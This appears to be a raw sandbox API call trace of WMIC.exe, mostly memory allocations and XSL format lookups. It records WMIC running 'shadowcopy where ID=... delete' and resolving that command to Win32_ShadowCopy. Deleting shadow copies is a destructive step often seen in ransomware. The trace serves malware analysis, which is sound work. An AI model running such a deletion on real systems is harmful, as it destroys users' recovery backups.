0x3 [0084.918] SysStringLen (param_1="TABLE") returned 0x5 [0084.918] SysStringLen (param_1="CSV") returned 0x3 [0084.918] SysStringLen (param_1="LIST") returned 0x4 [0084.918] SysStringLen (param_1="CSV") returned 0x3 [0084.918] SysStringLen (param_1="HTABLE") returned 0x6 [0084.918] SysStringLen (param_1="CSV") returned 0x3 [0084.918] SysStringLen (param_1="HFORM") returned 0x5 [0084.918] malloc (_Size=0x30) returned 0x138280 [0084.918] malloc (_Size=0x18) returned 0x13c760 [0084.919] free (_Block=0x13c760) [0084.919] malloc (_Size=0x18) returned 0x13c760 [0084.919] malloc (_Size=0x18) returned 0x13c780 [0084.919] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.919] SysStringLen (param_1="TABLE") returned 0x5 [0084.919] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.919] SysStringLen (param_1="VALUE") returned 0x5 [0084.919] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.919] SysStringLen (param_1="XML") returned 0x3 [0084.919] SysStringLen (param_1="XML") returned 0x3 [0084.919] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.919] malloc (_Size=0x30) returned 0x1382c0 [0084.919] malloc (_Size=0x18) returned 0x13c7a0 [0084.919] free (_Block=0x13c7a0) [0084.919] malloc (_Size=0x18) returned 0x13c7a0 [0084.919] malloc (_Size=0x18) returned 0x13c7c0 [0084.920] SysStringLen (param_1="texttablewsys") returned 0xd [0084.920] SysStringLen (param_1="TABLE") returned 0x5 [0084.920] SysStringLen (param_1="texttablewsys") returned 0xd [0084.920] SysStringLen (param_1="XML") returned 0x3 [0084.920] SysStringLen (param_1="texttablewsys") returned 0xd [0084.920] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.920] SysStringLen (param_1="XML") returned 0x3 [0084.920] SysStringLen (param_1="texttablewsys") returned 0xd [0084.920] malloc (_Size=0x30) returned 0x138300 [0084.920] malloc (_Size=0x18) returned 0x13c7e0 [0084.920] free (_Block=0x13c7e0) [0084.920] malloc (_Size=0x18) returned 0x13c7e0 [0084.920] malloc (_Size=0x18) returned 0x13c800 [0084.920] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0084.920] SysStringLen (param_1="TABLE") returned 0x5 [0084.920] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0084.920] SysStringLen (param_1="XML") returned 0x3 [0084.920] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0084.920] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.920] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.920] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0084.920] malloc (_Size=0x30) returned 0x138340 [0084.921] malloc (_Size=0x18) returned 0x13c820 [0084.921] free (_Block=0x13c820) [0084.921] malloc (_Size=0x18) returned 0x13c820 [0084.921] malloc (_Size=0x18) returned 0x13c840 [0084.921] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0084.921] SysStringLen (param_1="TABLE") returned 0x5 [0084.921] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0084.921] SysStringLen (param_1="XML") returned 0x3 [0084.921] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0084.922] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.922] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0084.922] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0084.922] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.922] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0084.922] malloc (_Size=0x30) returned 0x138380 [0084.922] malloc (_Size=0x18) returned 0x13c860 [0084.922] free (_Block=0x13c860) [0084.922] malloc (_Size=0x18) returned 0x13c860 [0084.922] malloc (_Size=0x18) returned 0x13c880 [0084.922] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0084.922] SysStringLen (param_1="TABLE") returned 0x5 [0084.922] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0084.922] SysStringLen (param_1="XML") returned 0x3 [0084.922] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0084.923] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.923] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0084.923] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0084.923] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0084.923] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0084.923] malloc (_Size=0x30) returned 0x1383c0 [0084.923] malloc (_Size=0x18) returned 0x13c8a0 [0084.923] free (_Block=0x13c8a0) [0084.923] malloc (_Size=0x18) returned 0x13c8a0 [0084.923] malloc (_Size=0x18) returned 0x13c8c0 [0084.923] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0084.923] SysStringLen (param_1="TABLE") returned 0x5 [0084.923] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0084.923] SysStringLen (param_1="XML") returned 0x3 [0084.923] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0084.924] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.924] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0084.924] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0084.924] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0084.924] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0084.924] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0084.924] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0084.924] malloc (_Size=0x30) returned 0x138400 [0084.924] malloc (_Size=0x18) returned 0x13c8e0 [0084.924] free (_Block=0x13c8e0) [0084.924] malloc (_Size=0x18) returned 0x13c8e0 [0084.924] malloc (_Size=0x18) returned 0x13c900 [0084.924] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0084.924] SysStringLen (param_1="TABLE") returned 0x5 [0084.924] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0084.924] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.925] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0084.925] SysStringLen (param_1="XML") returned 0x3 [0084.925] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0084.925] SysStringLen (param_1="texttablewsys") returned 0xd [0084.925] SysStringLen (param_1="XML") returned 0x3 [0084.925] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0084.925] malloc (_Size=0x30) returned 0x138440 [0084.925] malloc (_Size=0x18) returned 0x13c920 [0084.925] free (_Block=0x13c920) [0084.925] malloc (_Size=0x18) returned 0x13c920 [0084.925] malloc (_Size=0x18) returned 0x13c940 [0084.925] SysStringLen (param_1="htable-sortby") returned 0xd [0084.925] SysStringLen (param_1="TABLE") returned 0x5 [0084.925] SysStringLen (param_1="htable-sortby") returned 0xd [0084.925] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.925] SysStringLen (param_1="htable-sortby") returned 0xd [0084.925] SysStringLen (param_1="XML") returned 0x3 [0084.926] SysStringLen (param_1="htable-sortby") returned 0xd [0084.926] SysStringLen (param_1="texttablewsys") returned 0xd [0084.926] SysStringLen (param_1="htable-sortby") returned 0xd [0084.926] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0084.926] SysStringLen (param_1="XML") returned 0x3 [0084.926] SysStringLen (param_1="htable-sortby") returned 0xd [0084.926] malloc (_Size=0x30) returned 0x138480 [0084.926] malloc (_Size=0x18) returned 0x13c960 [0084.926] free (_Block=0x13c960) [0084.926] malloc (_Size=0x18) returned 0x13c960 [0084.937] malloc (_Size=0x18) returned 0x13c980 [0084.937] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0084.937] SysStringLen (param_1="TABLE") returned 0x5 [0084.937] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0084.937] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.937] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0084.938] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0084.938] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0084.938] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0084.938] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.938] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0084.938] malloc (_Size=0x30) returned 0x1384c0 [0084.938] malloc (_Size=0x18) returned 0x13c9a0 [0084.938] free (_Block=0x13c9a0) [0084.938] malloc (_Size=0x18) returned 0x13c9a0 [0084.938] malloc (_Size=0x18) returned 0x13c9c0 [0084.938] SysStringLen (param_1="wmiclimofformat") returned 0xf [0084.938] SysStringLen (param_1="TABLE") returned 0x5 [0084.938] SysStringLen (param_1="wmiclimofformat") returned 0xf [0084.938] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.938] SysStringLen (param_1="wmiclimofformat") returned 0xf [0084.938] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0084.939] SysStringLen (param_1="wmiclimofformat") returned 0xf [0084.939] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0084.939] SysStringLen (param_1="wmiclimofformat") returned 0xf [0084.939] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0084.939] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.939] SysStringLen (param_1="wmiclimofformat") returned 0xf [0084.939] malloc (_Size=0x30) returned 0x138500 [0084.939] malloc (_Size=0x18) returned 0x13c9e0 [0084.939] free (_Block=0x13c9e0) [0084.939] malloc (_Size=0x18) returned 0x13c9e0 [0084.939] malloc (_Size=0x18) returned 0x13ca00 [0084.939] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0084.939] SysStringLen (param_1="TABLE") returned 0x5 [0084.939] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0084.939] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.939] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0084.940] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0084.940] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0084.940] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0084.940] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0084.940] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0084.940] malloc (_Size=0x30) returned 0x138540 [0084.940] malloc (_Size=0x18) returned 0x13ca20 [0084.940] free (_Block=0x13ca20) [0084.940] malloc (_Size=0x18) returned 0x13ca20 [0084.940] malloc (_Size=0x18) returned 0x13ca40 [0084.940] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0084.940] SysStringLen (param_1="TABLE") returned 0x5 [0084.940] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0084.941] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0084.941] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0084.941] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0084.941] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0084.941] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0084.941] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0084.941] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0084.941] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0084.941] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0084.941] malloc (_Size=0x30) returned 0x138580 [0084.941] FreeThreadedDOMDocument:IUnknown:Release (This=0x1d171d0) returned 0x0 [0084.941] free (_Block=0x136e90) [0084.941] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete" [0084.942] malloc (_Size=0xe0) returned 0x13cd30 [0084.942] memcpy_s (in: _Destination=0x13cd30, _DestinationSize=0xde, _Source=0x2d25be, _SourceSize=0xd0 | out: _Destination=0x13cd30) returned 0x0 [0084.942] malloc (_Size=0x18) returned 0x13ca60 [0084.942] malloc (_Size=0x18) returned 0x13ca80 [0084.942] malloc (_Size=0x18) returned 0x13caa0 [0084.942] malloc (_Size=0x18) returned 0x13cac0 [0084.942] malloc (_Size=0x80) returned 0x136e90 [0084.942] GetLocalTime (in: lpSystemTime=0x1cfb50 | out: lpSystemTime=0x1cfb50*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x36, wSecond=0x31, wMilliseconds=0x283)) [0084.942] _vsnwprintf (in: _Buffer=0x136e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1cfaa8 | out: _Buffer="09-04-2020T08:54:49") returned 19 [0084.942] lstrlenW (lpString=" shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete") returned 71 [0084.942] malloc (_Size=0x90) returned 0x1370a0 [0084.942] lstrlenW (lpString=" shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete") returned 71 [0084.942] lstrlenW (lpString=" shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete") returned 71 [0084.942] malloc (_Size=0x90) returned 0x13ce20 [0084.942] lstrlenW (lpString=" shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete") returned 71 [0084.943] lstrlenW (lpString=" shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete") returned 71 [0084.943] lstrlenW (lpString=" shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete") returned 71 [0084.943] malloc (_Size=0x16) returned 0x13cae0 [0084.943] lstrlenW (lpString="shadowcopy") returned 10 [0084.943] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0084.943] malloc (_Size=0x16) returned 0x13cb00 [0084.943] malloc (_Size=0x8) returned 0x137140 [0084.943] free (_Block=0x0) [0084.943] free (_Block=0x13cae0) [0084.943] lstrlenW (lpString=" shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete") returned 71 [0084.943] malloc (_Size=0xc) returned 0x13cae0 [0084.943] lstrlenW (lpString="where") returned 5 [0084.943] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0084.943] malloc (_Size=0xc) returned 0x13cb20 [0084.943] malloc (_Size=0x10) returned 0x13cb40 [0084.943] memmove_s (in: _Destination=0x13cb40, _DestinationSize=0x8, _Source=0x137140, _SourceSize=0x8 | out: _Destination=0x13cb40) returned 0x0 [0084.943] free (_Block=0x137140) [0084.943] free (_Block=0x0) [0084.943] free (_Block=0x13cae0) [0084.943] lstrlenW (lpString=" shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete") returned 71 [0084.943] malloc (_Size=0x5c) returned 0x13cec0 [0084.943] lstrlenW (lpString="\"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\"") returned 45 [0084.943] _wcsicmp (_String1="\"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\"", _String2="\"NULL\"") returned -5 [0084.943] lstrlenW (lpString="\"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\"") returned 45 [0084.943] lstrlenW (lpString="\"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\"") returned 45 [0084.943] malloc (_Size=0x5c) returned 0x13cf30 [0084.943] malloc (_Size=0x18) returned 0x13cae0 [0084.944] memmove_s (in: _Destination=0x13cae0, _DestinationSize=0x10, _Source=0x13cb40, _SourceSize=0x10 | out: _Destination=0x13cae0) returned 0x0 [0084.944] free (_Block=0x13cb40) [0084.944] free (_Block=0x0) [0084.944] free (_Block=0x13cec0) [0084.944] lstrlenW (lpString=" shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete") returned 71 [0084.944] malloc (_Size=0xe) returned 0x13cb40 [0084.944] lstrlenW (lpString="delete") returned 6 [0084.944] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0084.944] malloc (_Size=0xe) returned 0x13cb60 [0084.944] malloc (_Size=0x20) returned 0x13cec0 [0084.944] memmove_s (in: _Destination=0x13cec0, _DestinationSize=0x18, _Source=0x13cae0, _SourceSize=0x18 | out: _Destination=0x13cec0) returned 0x0 [0084.944] free (_Block=0x13cae0) [0084.944] free (_Block=0x0) [0084.944] free (_Block=0x13cb40) [0084.944] malloc (_Size=0x20) returned 0x13cef0 [0084.944] lstrlenW (lpString="QUIT") returned 4 [0084.944] lstrlenW (lpString="shadowcopy") returned 10 [0084.944] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0084.944] lstrlenW (lpString="EXIT") returned 4 [0084.944] lstrlenW (lpString="shadowcopy") returned 10 [0084.944] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0084.944] free (_Block=0x13cef0) [0084.944] WbemLocator:IUnknown:AddRef (This=0x1df1390) returned 0x2 [0084.944] malloc (_Size=0x20) returned 0x13cef0 [0084.944] lstrlenW (lpString="/") returned 1 [0084.945] lstrlenW (lpString="shadowcopy") returned 10 [0084.945] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0084.945] lstrlenW (lpString="-") returned 1 [0084.945] lstrlenW (lpString="shadowcopy") returned 10 [0084.945] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0084.945] lstrlenW (lpString="CLASS") returned 5 [0084.945] lstrlenW (lpString="shadowcopy") returned 10 [0084.945] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0084.945] lstrlenW (lpString="PATH") returned 4 [0084.945] lstrlenW (lpString="shadowcopy") returned 10 [0084.945] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0084.945] lstrlenW (lpString="CONTEXT") returned 7 [0084.945] lstrlenW (lpString="shadowcopy") returned 10 [0084.945] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0084.945] lstrlenW (lpString="shadowcopy") returned 10 [0084.945] malloc (_Size=0x16) returned 0x13cb40 [0084.945] lstrlenW (lpString="shadowcopy") returned 10 [0084.945] GetCurrentThreadId () returned 0x8ac [0084.945] ??0CHString@@QEAA@XZ () returned 0x1cf960 [0084.945] malloc (_Size=0x18) returned 0x13cae0 [0084.945] malloc (_Size=0x18) returned 0x13cb80 [0084.946] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1df1390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff172998 | out: ppNamespace=0xff172998*=0x1e03a98) returned 0x0 [0084.968] free (_Block=0x13cb80) [0084.968] free (_Block=0x13cae0) [0084.968] CoSetProxyBlanket (pProxy=0x1e03a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0084.968] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0084.968] GetCurrentThreadId () returned 0x8ac [0084.968] ??0CHString@@QEAA@XZ () returned 0x1cf7f8 [0084.968] malloc (_Size=0x18) returned 0x13cae0 [0084.968] malloc (_Size=0x18) returned 0x13cb80 [0084.968] malloc (_Size=0x18) returned 0x13cba0 [0084.968] malloc (_Size=0x18) returned 0x13cbc0 [0084.968] SysStringLen (param_1="root\\cli") returned 0x8 [0084.968] SysStringLen (param_1="\\") returned 0x1 [0084.968] malloc (_Size=0x18) returned 0x13cbe0 [0084.969] SysStringLen (param_1="root\\cli\\") returned 0x9 [0084.969] SysStringLen (param_1="ms_409") returned 0x6 [0084.969] free (_Block=0x13cbc0) [0084.969] free (_Block=0x13cba0) [0084.969] free (_Block=0x13cb80) [0084.969] free (_Block=0x13cae0) [0084.969] malloc (_Size=0x18) returned 0x13cae0 [0084.969] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1df1390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff1729a0 | out: ppNamespace=0xff1729a0*=0x1e03b28) returned 0x0 [0084.974] free (_Block=0x13cae0) [0084.974] free (_Block=0x13cbe0) [0084.974] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0084.974] GetCurrentThreadId () returned 0x8ac [0084.974] ??0CHString@@QEAA@XZ () returned 0x1cf970 [0084.974] malloc (_Size=0x18) returned 0x13cbe0 [0084.974] malloc (_Size=0x18) returned 0x13cae0 [0084.974] malloc (_Size=0x18) returned 0x13cb80 [0084.974] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0084.974] malloc (_Size=0x3a) returned 0x13cfa0 [0084.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff101980, cbMultiByte=-1, lpWideCharStr=0x13cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0084.974] free (_Block=0x13cfa0) [0084.974] malloc (_Size=0x18) returned 0x13cba0 [0084.974] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0084.974] SysStringLen (param_1="shadowcopy") returned 0xa [0084.974] malloc (_Size=0x18) returned 0x13cbc0 [0084.974] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0084.974] SysStringLen (param_1="'") returned 0x1 [0084.975] free (_Block=0x13cba0) [0084.975] free (_Block=0x13cb80) [0084.975] free (_Block=0x13cae0) [0084.975] free (_Block=0x13cbe0) [0084.975] IWbemServices:GetObject (in: This=0x1e03a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x1cf978*=0x0, ppCallResult=0x0 | out: ppObject=0x1cf978*=0x1e104e0, ppCallResult=0x0) returned 0x0 [0084.982] malloc (_Size=0x18) returned 0x13cbe0 [0084.982] IWbemClassObject:Get (in: This=0x1e104e0, wszName="Target", lFlags=0, pVal=0x1cf8a0*(varType=0x0, wReserved1=0xff17, wReserved2=0x0, wReserved3=0x0, varVal1=0xff172998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf8a0*(varType=0x8, wReserved1=0xff17, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0084.982] free (_Block=0x13cbe0) [0084.982] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0084.982] malloc (_Size=0x3e) returned 0x13cfa0 [0084.982] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0084.982] malloc (_Size=0x18) returned 0x13cbe0 [0084.982] IWbemClassObject:Get (in: This=0x1e104e0, wszName="PWhere", lFlags=0, pVal=0x1cf8a0*(varType=0x0, wReserved1=0xff17, wReserved2=0x0, wReserved3=0x0, varVal1=0x2fe298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf8a0*(varType=0x8, wReserved1=0xff17, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0084.982] free (_Block=0x13cbe0) [0084.982] lstrlenW (lpString=" Where ID = '#'") returned 15 [0084.982] malloc (_Size=0x20) returned 0x13cff0 [0084.983] lstrlenW (lpString=" Where ID = '#'") returned 15 [0084.983] malloc (_Size=0x18) returned 0x13cbe0 [0084.983] IWbemClassObject:Get (in: This=0x1e104e0, wszName="Connection", lFlags=0, pVal=0x1cf8a0*(varType=0x0, wReserved1=0xff17, wReserved2=0x0, wReserved3=0x0, varVal1=0x34bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf8a0*(varType=0xd, wReserved1=0xff17, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e109c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0084.983] free (_Block=0x13cbe0) [0084.983] IUnknown:QueryInterface (in: This=0x1e109c0, riid=0xff107360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1cf890 | out: ppvObject=0x1cf890*=0x1e109c0) returned 0x0 [0084.983] GetCurrentThreadId () returned 0x8ac [0084.983] ??0CHString@@QEAA@XZ () returned 0x1cf7b8 [0084.983] malloc (_Size=0x18) returned 0x13cbe0 [0084.983] IWbemClassObject:Get (in: This=0x1e109c0, wszName="Namespace", lFlags=0, pVal=0x1cf7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff11738f, varVal2=0x13cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf7e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x13cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0084.983] free (_Block=0x13cbe0) [0084.983] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0084.983] malloc (_Size=0x16) returned 0x13cbe0 [0084.983] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0084.983] malloc (_Size=0x18) returned 0x13cae0 [0084.983] IWbemClassObject:Get (in: This=0x1e109c0, wszName="Locale", lFlags=0, pVal=0x1cf7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x37a648, varVal2=0x13cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf7e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x13cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0084.983] free (_Block=0x13cae0) [0084.984] lstrlenW (lpString="ms_409") returned 6 [0084.984] malloc (_Size=0xe) returned 0x13cae0 [0084.984] lstrlenW (lpString="ms_409") returned 6 [0084.984] malloc (_Size=0x18) returned 0x13cb80 [0084.984] IWbemClassObject:Get (in: This=0x1e109c0, wszName="User", lFlags=0, pVal=0x1cf7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x37a648, varVal2=0x13cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf7e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x37a648, varVal2=0x13cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0084.984] free (_Block=0x13cb80) [0084.984] malloc (_Size=0x18) returned 0x13cb80 [0084.984] IWbemClassObject:Get (in: This=0x1e109c0, wszName="Password", lFlags=0, pVal=0x1cf7e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x37a648, varVal2=0x13cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf7e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x37a648, varVal2=0x13cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0084.984] free (_Block=0x13cb80) [0084.984] malloc (_Size=0x18) returned 0x13cb80 [0084.984] IWbemClassObject:Get (in: This=0x1e109c0, wszName="Server", lFlags=0, pVal=0x1cf7e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x37a648, varVal2=0x13cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf7e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x13cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0084.984] free (_Block=0x13cb80) [0084.984] lstrlenW (lpString=".") returned 1 [0084.984] malloc (_Size=0x4) returned 0x137140 [0084.984] lstrlenW (lpString=".") returned 1 [0084.984] malloc (_Size=0x18) returned 0x13cb80 [0084.984] IWbemClassObject:Get (in: This=0x1e109c0, wszName="Authority", lFlags=0, pVal=0x1cf7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x37a648, varVal2=0x13cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf7e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x37a648, varVal2=0x13cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0084.984] free (_Block=0x13cb80) [0084.985] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0084.985] IUnknown:Release (This=0x1e109c0) returned 0x1 [0084.985] GetCurrentThreadId () returned 0x8ac [0084.985] ??0CHString@@QEAA@XZ () returned 0x1cf7b8 [0084.985] malloc (_Size=0x18) returned 0x13cb80 [0084.985] IWbemClassObject:Get (in: This=0x1e104e0, wszName="__RELPATH", lFlags=0, pVal=0x1cf7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, 